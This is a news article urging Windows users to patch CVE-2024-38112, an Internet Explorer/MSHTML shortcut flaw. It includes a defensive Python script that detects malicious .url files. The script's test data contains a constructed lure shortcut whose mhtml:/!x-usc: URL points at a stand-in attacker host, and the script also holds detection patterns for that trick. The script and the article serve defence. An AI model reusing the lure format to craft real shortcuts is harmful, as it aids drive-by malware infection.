Windows Users Urged to Update Immediately to Protect Against New Threats


With images of countless blue screens still haunting the headlines, it’s all too easy to forget that July’s Windows outage was down to CrowdStrike rather than Microsoft, and that separate Windows threats reported this month still need dealing with right away. Many millions of PCs remain unpatched and at risk.

Earlier this month, before blue screens of death started trending, both Check Point and Trend Micro warned that Windows 10 and 11 users are at risk from a “previously unknown” threat that wakes up the retired Internet Explorer code still present on hundreds of millions of PCs and exploits its well-known security weaknesses.

As Check Point reported on July 9, “attackers are using special Windows Internet Shortcut files, which, when clicked, call the retired Internet Explorer (IE) to visit the attacker-controlled URL… By opening the URL with IE instead of the modern and much more secure Chrome/Edge browser on Windows, the attacker gained significant advantages in exploiting the victim’s computer, although the computer is running the modern Windows 10/11 operating system.”

Then just days later, Trend Micro ramped up the threat level, reporting that the vulnerability “was used as a zero-day to access and execute files through the disabled Internet Explorer using MSHTML… infect[ing] victim machines with the Atlantida info-stealer, which focuses on pilfering system information and sensitive data (like passwords and cookies) from various applications.”
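The two vendor descriptions above come down to one artefact: a Windows Internet Shortcut (.url) file whose URL= line is crafted so that the link is handed to the legacy IE/MSHTML engine rather than the default browser. The following triage script is an added example written for this page, not code from Check Point, Trend Micro, CISA or Microsoft. It assumes the URL= pattern that Check Point’s write-up documented (an mhtml: prefix followed by an !x-usc: segment) and uses constructed file contents, hosts and paths; a real hunt would point scan_directory at user Desktop, Downloads and mail-attachment folders.

```python
"""Triage Windows Internet Shortcut (.url) files for the pattern that
forces a link into the legacy IE/MSHTML engine (CVE-2024-38112 lure).

Added example for this article; not vendor or Microsoft code.
Assumption: the lure's URL= value starts with 'mhtml:' and contains an
'!x-usc:' segment, as described in Check Point's research. All sample
file contents, hosts and paths below are constructed.
"""
import configparser
import os
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# 'mhtml:' URIs are owned by the IE/MSHTML stack even on Windows 10/11.
MHTML_PREFIX = re.compile(r"^\s*mhtml:", re.IGNORECASE)
# The '!x-usc:' separator is an IE-only parsing trick for mhtml: URIs.
XUSC_SPLIT = re.compile(r"!x-usc:", re.IGNORECASE)


@dataclass
class Finding:
    path: str
    url: str
    reasons: List[str] = field(default_factory=list)
    targets: List[str] = field(default_factory=list)


def parse_url_file(text: str) -> Dict[str, str]:
    """A .url file is an INI file with an [InternetShortcut] section.

    Only '=' is treated as a delimiter so that ':' inside the URL value
    is left alone. Keys are returned lower-cased.
    """
    cp = configparser.RawConfigParser(
        strict=False, allow_no_value=True, delimiters=("=",)
    )
    cp.read_string(text)
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            return {k.lower(): (v or "") for k, v in cp.items(section)}
    return {}


def analyse(path: str, text: str) -> Optional[Finding]:
    """Return a Finding if the shortcut shows the MSHTML-invoking pattern."""
    fields = parse_url_file(text)
    url = fields.get("url", "")
    finding = Finding(path=path, url=url)

    if MHTML_PREFIX.match(url):
        finding.reasons.append("mhtml: prefix routes the link to IE/MSHTML")
        body = MHTML_PREFIX.sub("", url, count=1)
        parts = XUSC_SPLIT.split(body)
        if len(parts) > 1:
            finding.reasons.append("!x-usc: segment present (IE-only parsing)")
        # Every segment is a URL IE may fetch; record all of them for blocking.
        finding.targets = [p.strip() for p in parts if p.strip()]

    return finding if finding.reasons else None


def scan_directory(root: str) -> List[Finding]:
    """Walk a directory tree and triage every *.url file found."""
    findings: List[Finding] = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(".url"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                result = analyse(full, fh.read())
            if result:
                findings.append(result)
    return findings


# Constructed sample shortcuts (not real samples).
BENIGN_URL_FILE = "[InternetShortcut]\nURL=https://example.com/\nIconIndex=0\n"
SUSPECT_URL_FILE = (
    "[InternetShortcut]\n"
    "URL=mhtml:http://attacker.example/lure.pdf"
    "!x-usc:http://attacker.example/lure.pdf\n"
    "ShowCommand=7\n"
    "IconIndex=13\n"
    "IconFile=C:\\Windows\\System32\\shell32.dll\n"
)

if __name__ == "__main__":
    for label, content in (("benign.url", BENIGN_URL_FILE),
                           ("lure.url", SUSPECT_URL_FILE)):
        hit = analyse(label, content)
        print(label, "->", "clean" if hit is None else hit.reasons)
```

The `targets` list is what you would feed to a proxy or DNS block-list; the `reasons` list is what belongs in the alert. Because the check is on file contents rather than behaviour, it also catches lures that have been delivered but not yet clicked.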

Following Check Point’s disclosure, CISA added the vulnerability to its Known Exploited Vulnerabilities catalog, describing it as “a spoofing vulnerability that has a high impact to confidentiality, integrity, and availability.”

The vulnerability has been patched; users just need to make sure their Windows PCs have installed the update. Under CISA’s directive, US federal civilian agencies must apply that update by July 30. All other organizations, and home users too, should follow suit given the current threat landscape. Per Check Point, Trend Micro, and CISA, this vulnerability has been exploited in the wild. Worse, Check Point says those attacks have been ongoing for more than 12 months.

In its July security update, Microsoft publicly acknowledged that the vulnerability had been exploited, telling me “we greatly appreciate [Check Point’s] Haifei Li for this research and for responsibly reporting it under a coordinated vulnerability disclosure. Customers who have installed the update are already protected.”

If there was any doubt as to the scale of risk this vulnerability represents, research into the potential exposure to this specific attack should change minds. Sevco has just released a report that “zooms in on the specific part of the attack surface at risk because of CVE-2024-38112.” “A significant percentage of Windows devices,” they warn, “are fully exposed and at risk of being taken over by attackers.”

The researchers say that analysis of more than 500,000 Windows 10 and Windows 11 devices suggests that “more than 10% of devices are missing endpoint protection controls,” adding that “this means that CISOs and IT organizations are completely blind to tens of thousands of doors and windows (so to speak) wide open for attackers to breach networks and access crown jewel data.”

Check Point told me the vulnerability was “especially surprising… leveraging Internet Explorer, which many users may not realize is even on their computer… All Windows users [should] immediately apply the Microsoft patch to protect themselves.”

Ironically, this isn’t the only Internet Explorer vulnerability to make it onto CISA’s Known Exploited Vulnerabilities list this month. A separate warning about a use-after-free memory vulnerability in Internet Explorer has also just cropped up, despite the browser’s end-of-life status. This time around, CISA’s guidance is even blunter: “The impacted product is end-of-life and should be disconnected if still in use.”

The pre-update risk for PC users is best summed up by Trend Micro, which described the attack as “a prime example of how unsupported Windows relics are an overlooked attack surface that can still be exploited by threat actors to infect unsuspecting users with ransomware, backdoors, or as a conduit for other kinds of malware.”

The Windows outage this month, whatever its cause, swamped the news cycle. While the CrowdStrike issue has been painful and costly, it is not itself a cyber threat, although bad actors are now clearly taking advantage of the confusion. The quieter threat behind CISA’s warning is exactly the opposite: you won’t know you’ve been hit until it’s too late. So make sure you apply the update, if it isn’t installed already.

“When IT assets are missing endpoint security,” Sevco advises in its report, “malicious actors have a direct path to their networks,” and while “most enterprises are highly proficient at patching known IT assets,” they warn, “it’s the unpatched, hidden or unknown assets that introduce the highest level of risk.”

All the more reason to adhere to CISA’s warning and its July 30 deadline.

